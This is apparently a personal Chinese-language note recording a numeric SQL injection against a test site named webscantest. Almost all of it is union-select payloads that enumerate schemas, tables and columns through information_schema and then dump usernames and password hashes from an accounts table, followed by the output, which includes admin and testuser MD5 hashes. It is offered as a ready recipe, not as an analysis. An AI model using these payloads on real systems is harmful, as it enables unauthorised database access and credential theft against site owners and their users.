記錄一下

數(shù)字型注入

1 or 1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

1 or 1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

1 or 1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='accounts'

1 or 1 union select 1,group_concat(uname,0x3a,passwd),3,4 from accounts

user() = webscantest@localhost
database() = webscantest
tables = accounts,inventory,orders,products
column_name = id,uname,passwd,fname,lname

admin:21232f297a57a5a743894a0e4a801fc3,testuser:179ad45c6ce2cb97cf1029e212046e81